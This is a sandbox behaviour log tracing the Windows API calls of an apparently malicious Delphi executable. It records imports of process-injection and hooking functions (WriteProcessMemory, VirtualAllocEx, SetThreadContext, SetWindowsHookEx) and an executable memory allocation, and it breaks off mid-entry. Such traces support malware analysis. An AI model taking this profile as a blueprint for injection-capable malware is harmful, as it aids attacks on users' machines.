# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 14.10.2020 09:16:49.469 Process: id = "1" image_name = "waqro5owezanslij.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe" page_root = "0x4ab78000" os_pid = "0xba0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xba4 [0040.988] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0040.988] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0040.988] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0040.988] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0040.988] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0040.989] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0040.989] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0040.989] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0040.989] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0040.989] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0040.989] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0040.989] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0040.989] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0040.989] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0040.989] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0040.989] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualQuery") returned 0x76d4445a [0040.990] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0040.990] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0040.990] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0040.990] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynA") returned 0x76d5192a [0040.990] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExA") returned 0x76d44913 [0040.990] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadLocale") returned 0x76d435cf [0040.990] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoA") returned 0x76d40e00 [0040.990] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0040.990] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0040.990] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0040.990] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoA") returned 0x76d5d5e5 [0040.990] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0040.990] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0040.991] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileA") returned 0x76d4e2ce [0040.991] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0040.991] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0040.991] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0040.991] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0040.991] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0040.991] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0040.991] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0040.991] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0040.991] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0040.991] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0040.991] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0040.991] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0040.991] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0040.992] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0040.992] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpA") returned 0x76d5eceb [0040.992] GetProcAddress (hModule=0x76d30000, lpProcName="WriteProcessMemory") returned 0x76d5d9e0 [0040.992] GetProcAddress (hModule=0x76d30000, lpProcName="WritePrivateProfileStringW") returned 0x76d6640c [0040.992] GetProcAddress (hModule=0x76d30000, lpProcName="WritePrivateProfileStringA") returned 0x76d67048 [0040.992] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0040.992] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualUnlock") returned 0x76d5ef41 [0040.992] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtectEx") returned 0x76dc45bf [0040.992] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0040.992] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualLock") returned 0x76d5ec3b [0040.992] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAllocEx") returned 0x76d5d9b0 [0040.992] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0040.992] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0040.993] GetProcAddress (hModule=0x76d30000, lpProcName="SystemTimeToFileTime") returned 0x76d45a7e [0040.993] GetProcAddress (hModule=0x76d30000, lpProcName="SuspendThread") returned 0x76d67d7e [0040.993] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0040.993] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0040.993] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadPriority") returned 0x76d432bb [0040.993] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadLocale") returned 0x76d489d9 [0040.993] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadContext") returned 0x76dc5393 [0040.993] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0040.994] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileTime") returned 0x76d5ecbb [0040.994] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0040.994] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileAttributesW") returned 0x76d5d4f7 [0040.994] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileAttributesA") returned 0x76d5ecd3 [0040.994] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0040.994] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0040.994] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0040.994] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0040.994] GetProcAddress (hModule=0x76d30000, lpProcName="SetCurrentDirectoryW") returned 0x76d51260 [0040.994] GetProcAddress (hModule=0x76d30000, lpProcName="SetCurrentDirectoryA") returned 0x76d51834 [0040.995] GetProcAddress (hModule=0x76d30000, lpProcName="ResumeThread") returned 0x76d443ef [0040.995] GetProcAddress (hModule=0x76d30000, lpProcName="ResetEvent") returned 0x76d416dd [0040.995] GetProcAddress (hModule=0x76d30000, lpProcName="RemoveDirectoryW") returned 0x76dc44cf [0040.995] GetProcAddress (hModule=0x76d30000, lpProcName="RemoveDirectoryA") returned 0x76dc44bf [0040.995] GetProcAddress (hModule=0x76d30000, lpProcName="ReadProcessMemory") returned 0x76d5cfcc [0040.995] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0040.995] GetProcAddress (hModule=0x76d30000, lpProcName="QueryDosDeviceW") returned 0x76d6ceec [0040.995] GetProcAddress (hModule=0x76d30000, lpProcName="PostQueuedCompletionStatus") returned 0x76d5ef29 [0040.995] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0040.995] GetProcAddress (hModule=0x76d30000, lpProcName="MulDiv") returned 0x76d41b80 [0040.995] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFileEx") returned 0x76d44c83 [0040.995] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0040.995] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0040.995] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0040.996] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0040.996] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0040.996] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0040.996] GetProcAddress (hModule=0x76d30000, lpProcName="IsBadWritePtr") returned 0x76d6d1ec [0040.996] GetProcAddress (hModule=0x76d30000, lpProcName="IsBadStringPtrW") returned 0x76d63088 [0040.996] GetProcAddress (hModule=0x76d30000, lpProcName="IsBadReadPtr") returned 0x76d6d075 [0040.996] GetProcAddress (hModule=0x76d30000, lpProcName="HeapDestroy") returned 0x76d435b7 [0040.996] GetProcAddress (hModule=0x76d30000, lpProcName="HeapCreate") returned 0x76d44a2d [0040.996] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0040.996] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalUnlock") returned 0x76d5cfdf [0040.996] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalReAlloc") returned 0x76d5e4be [0040.997] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalHandle") returned 0x76d6d27c [0040.997] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalLock") returned 0x76d5d0a7 [0040.997] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0040.997] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFindAtomA") returned 0x76d6d358 [0040.997] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalDeleteAtom") returned 0x76d5cdad [0040.997] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0040.997] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAddAtomA") returned 0x76d60526 [0040.997] GetProcAddress (hModule=0x76d30000, lpProcName="GetWindowsDirectoryW") returned 0x76d443e2 [0040.997] GetProcAddress (hModule=0x76d30000, lpProcName="GetWindowsDirectoryA") returned 0x76d62b0a [0040.997] GetProcAddress (hModule=0x76d30000, lpProcName="GetVolumeInformationA") returned 0x76d66dcb [0040.998] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0040.998] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0040.998] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadPriority") returned 0x76d443bf [0040.998] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadContext") returned 0x76d679d4 [0040.998] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathW") returned 0x76d5d4dc [0040.998] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathA") returned 0x76d6276c [0040.998] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempFileNameW") returned 0x76d6d1b6 [0040.998] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempFileNameA") returned 0x76d69d3f [0040.998] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemInfo") returned 0x76d449ca [0040.998] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0040.999] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryA") returned 0x76d5b66c [0040.999] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeExW") returned 0x76d45586 [0040.999] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeExA") returned 0x76d68266 [0040.999] GetProcAddress (hModule=0x76d30000, lpProcName="GetPrivateProfileStringW") returned 0x76d4ea48 [0040.999] GetProcAddress (hModule=0x76d30000, lpProcName="GetPrivateProfileStringA") returned 0x76d5184c [0040.999] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0040.999] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0040.999] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDriveStringsW") returned 0x76dc436f [0040.999] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0040.999] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocalTime") returned 0x76d45aa6 [0040.999] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0041.000] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathNameW") returned 0x76d440d4 [0041.000] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathNameA") returned 0x76d4e2c1 [0041.000] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0041.000] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesW") returned 0x76d41b18 [0041.000] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesA") returned 0x76d45414 [0041.000] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeThread") returned 0x76d5d5b5 [0041.000] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0041.000] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceA") returned 0x76dc433f [0041.000] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatA") returned 0x76d6a959 [0041.000] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0041.000] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0041.001] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0041.001] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentDirectoryW") returned 0x76d45611 [0041.001] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentDirectoryA") returned 0x76d6d4f6 [0041.001] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0041.001] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameA") returned 0x76d5b6e0 [0041.001] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0041.001] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0041.001] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0041.001] GetProcAddress (hModule=0x76d30000, lpProcName="FreeResource") returned 0x76d5d3db [0041.001] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedExchange") returned 0x76d41462 [0041.001] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0041.001] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageA") returned 0x76d65fbd [0041.002] GetProcAddress (hModule=0x76d30000, lpProcName="FlushInstructionCache") returned 0x76d44393 [0041.002] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0041.002] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceA") returned 0x76d5e9bb [0041.002] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0041.002] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileA") returned 0x76d6d53e [0041.002] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0041.002] GetProcAddress (hModule=0x76d30000, lpProcName="FileTimeToLocalFileTime") returned 0x76d4e29e [0041.002] GetProcAddress (hModule=0x76d30000, lpProcName="FileTimeToDosDateTime") returned 0x76d5c86d [0041.002] GetProcAddress (hModule=0x76d30000, lpProcName="EnumCalendarInfoA") returned 0x76d69e70 [0041.002] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0041.002] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0041.002] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0041.003] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0041.003] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0041.003] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingA") returned 0x76d45506 [0041.003] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0041.003] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0041.003] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventA") returned 0x76d4328c [0041.003] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0041.003] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0041.003] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0041.003] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringA") returned 0x76d43c5a [0041.003] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0041.003] GetProcAddress (hModule=0x76d30000, lpProcName="IsBadStringPtrA") returned 0x76d63173 [0041.003] GetModuleHandleA (lpModuleName="user32.dll") returned 0x77130000 [0041.004] GetProcAddress (hModule=0x77130000, lpProcName="GetKeyboardType") returned 0x77189ac4 [0041.004] GetProcAddress (hModule=0x77130000, lpProcName="LoadStringA") returned 0x7714db21 [0041.004] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0041.004] GetProcAddress (hModule=0x77130000, lpProcName="CharNextA") returned 0x77147a1b [0041.004] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0041.004] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExA") returned 0x7714d22e [0041.004] GetProcAddress (hModule=0x77130000, lpProcName="WindowFromPoint") returned 0x7716ed12 [0041.004] GetProcAddress (hModule=0x77130000, lpProcName="WinHelpA") returned 0x7716557f [0041.004] GetProcAddress (hModule=0x77130000, lpProcName="WaitMessage") returned 0x7716f5a9 [0041.004] GetProcAddress (hModule=0x77130000, lpProcName="VkKeyScanW") returned 0x7716fdcd [0041.004] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0041.004] GetProcAddress (hModule=0x77130000, lpProcName="UnregisterClassW") returned 0x77149f84 [0041.005] GetProcAddress (hModule=0x77130000, lpProcName="UnregisterClassA") returned 0x7714dced [0041.005] GetProcAddress (hModule=0x77130000, lpProcName="UnhookWindowsHookEx") returned 0x7716f52b [0041.005] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0041.005] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMDISysAccel") returned 0x7715858e [0041.005] GetProcAddress (hModule=0x77130000, lpProcName="TrackPopupMenu") returned 0x7716c288 [0041.005] GetProcAddress (hModule=0x77130000, lpProcName="SystemParametersInfoA") returned 0x77156c30 [0041.005] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0041.005] GetProcAddress (hModule=0x77130000, lpProcName="ShowScrollBar") returned 0x77154162 [0041.005] GetProcAddress (hModule=0x77130000, lpProcName="ShowOwnedPopups") returned 0x7715ae86 [0041.005] GetProcAddress (hModule=0x77130000, lpProcName="ShowCursor") returned 0x7716f670 [0041.005] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowsHookExW") returned 0x77157603 [0041.005] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowsHookExA") returned 0x7715835c [0041.006] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0041.006] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextA") returned 0x77157aee [0041.006] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowPos") returned 0x77148e4e [0041.006] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowPlacement") returned 0x77154ab6 [0041.006] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowLongW") returned 0x77148332 [0041.006] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowLongA") returned 0x77156110 [0041.006] GetProcAddress (hModule=0x77130000, lpProcName="SetTimer") returned 0x771479fb [0041.006] GetProcAddress (hModule=0x77130000, lpProcName="SetScrollRange") returned 0x7716d50b [0041.006] GetProcAddress (hModule=0x77130000, lpProcName="SetScrollPos") returned 0x771587a5 [0041.006] GetProcAddress (hModule=0x77130000, lpProcName="SetScrollInfo") returned 0x771540cf [0041.006] GetProcAddress (hModule=0x77130000, lpProcName="SetRect") returned 0x77150e1b [0041.006] GetProcAddress (hModule=0x77130000, lpProcName="SetPropA") returned 0x7715822c [0041.006] GetProcAddress (hModule=0x77130000, lpProcName="SetParent") returned 0x77152d64 [0041.007] GetProcAddress (hModule=0x77130000, lpProcName="SetMenuItemInfoW") returned 0x7716d320 [0041.007] GetProcAddress (hModule=0x77130000, lpProcName="SetMenuItemInfoA") returned 0x7715d307 [0041.007] GetProcAddress (hModule=0x77130000, lpProcName="SetMenu") returned 0x77152bb9 [0041.007] GetProcAddress (hModule=0x77130000, lpProcName="SetForegroundWindow") returned 0x7716f170 [0041.007] GetProcAddress (hModule=0x77130000, lpProcName="SetFocus") returned 0x77152175 [0041.007] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0041.007] GetProcAddress (hModule=0x77130000, lpProcName="SetClassLongA") returned 0x7715d5f9 [0041.007] GetProcAddress (hModule=0x77130000, lpProcName="SetCapture") returned 0x7716ed56 [0041.007] GetProcAddress (hModule=0x77130000, lpProcName="SetActiveWindow") returned 0x77153208 [0041.007] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0041.007] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageA") returned 0x7715612e [0041.007] GetProcAddress (hModule=0x77130000, lpProcName="ScrollWindow") returned 0x77159320 [0041.008] GetProcAddress (hModule=0x77130000, lpProcName="ScreenToClient") returned 0x7715227d [0041.008] GetProcAddress (hModule=0x77130000, lpProcName="RemovePropA") returned 0x77158284 [0041.008] GetProcAddress (hModule=0x77130000, lpProcName="RemoveMenu") returned 0x77157381 [0041.008] GetProcAddress (hModule=0x77130000, lpProcName="ReleaseDC") returned 0x77147446 [0041.008] GetProcAddress (hModule=0x77130000, lpProcName="ReleaseCapture") returned 0x7716ed49 [0041.008] GetProcAddress (hModule=0x77130000, lpProcName="RegisterWindowMessageA") returned 0x77150afa [0041.008] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClipboardFormatA") returned 0x77150afa [0041.008] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassW") returned 0x77148a65 [0041.008] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassA") returned 0x7715434b [0041.008] GetProcAddress (hModule=0x77130000, lpProcName="RedrawWindow") returned 0x7715140b [0041.008] GetProcAddress (hModule=0x77130000, lpProcName="PtInRect") returned 0x771511e9 [0041.008] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0041.008] GetProcAddress (hModule=0x77130000, lpProcName="PostMessageW") returned 0x771512a5 [0041.009] GetProcAddress (hModule=0x77130000, lpProcName="PostMessageA") returned 0x77153baa [0041.009] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageA") returned 0x77155f74 [0041.009] GetProcAddress (hModule=0x77130000, lpProcName="OffsetRect") returned 0x77150bbd [0041.009] GetProcAddress (hModule=0x77130000, lpProcName="OemToCharA") returned 0x771a199f [0041.009] GetProcAddress (hModule=0x77130000, lpProcName="MsgWaitForMultipleObjects") returned 0x77150b4a [0041.009] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0041.009] GetProcAddress (hModule=0x77130000, lpProcName="MapWindowPoints") returned 0x77148c40 [0041.009] GetProcAddress (hModule=0x77130000, lpProcName="MapVirtualKeyW") returned 0x77171459 [0041.009] GetProcAddress (hModule=0x77130000, lpProcName="MapVirtualKeyA") returned 0x771a6c1a [0041.009] GetProcAddress (hModule=0x77130000, lpProcName="LoadKeyboardLayoutA") returned 0x7718bb35 [0041.010] GetProcAddress (hModule=0x77130000, lpProcName="LoadIconA") returned 0x7714dafb [0041.018] LoadLibraryA (lpLibFileName="comctl32.dll") returned 0x75590000 [0042.350] LoadLibraryA (lpLibFileName="SHFolder.dll") returned 0x75580000 [0042.377] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6d69c0 [0042.394] GetKeyboardType (nTypeFlag=0) returned 4 [0042.430] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe\" " [0042.430] GetStartupInfoA (in: lpStartupInfo=0x41f78c | out: lpStartupInfo=0x41f78c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0042.430] GetVersion () returned 0x1db10106 [0042.430] GetVersion () returned 0x1db10106 [0042.430] GetCurrentThreadId () returned 0xba4 [0042.448] GetModuleFileNameA (in: hModule=0x13ce000, lpFilename=0x41f288, nSize=0x105 | out: lpFilename="." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\.")) returned 0x0 [0042.448] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x41f163, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe")) returned 0x3a [0042.448] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x41f278 | out: phkResult=0x41f278*=0x0) returned 0x2 [0042.541] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x41f278 | out: phkResult=0x41f278*=0x0) returned 0x2 [0042.541] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x41f278 | out: phkResult=0x41f278*=0x0) returned 0x2 [0042.542] lstrcpynA (in: lpString1=0x41f163, lpString2=".", iMaxLength=261 | out: lpString1=".") returned="." [0042.542] GetThreadLocale () returned 0x409 [0042.542] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x41f273, cchData=5 | out: lpLCData="ENU") returned 4 [0042.544] lstrlenA (lpString=".") returned 1 [0042.544] LoadStringA (in: hInstance=0x13ce000, uID=0xffd6, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Invalid NULL variant operation") returned 0x1e [0042.544] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x6d6d38 [0042.544] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x420000 [0042.544] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x6d7d38 [0042.545] VirtualAlloc (lpAddress=0x420000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x420000 [0042.545] LoadStringA (in: hInstance=0x13ce000, uID=0xffd5, lpBuffer=0x41f3ac, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0042.545] LoadStringA 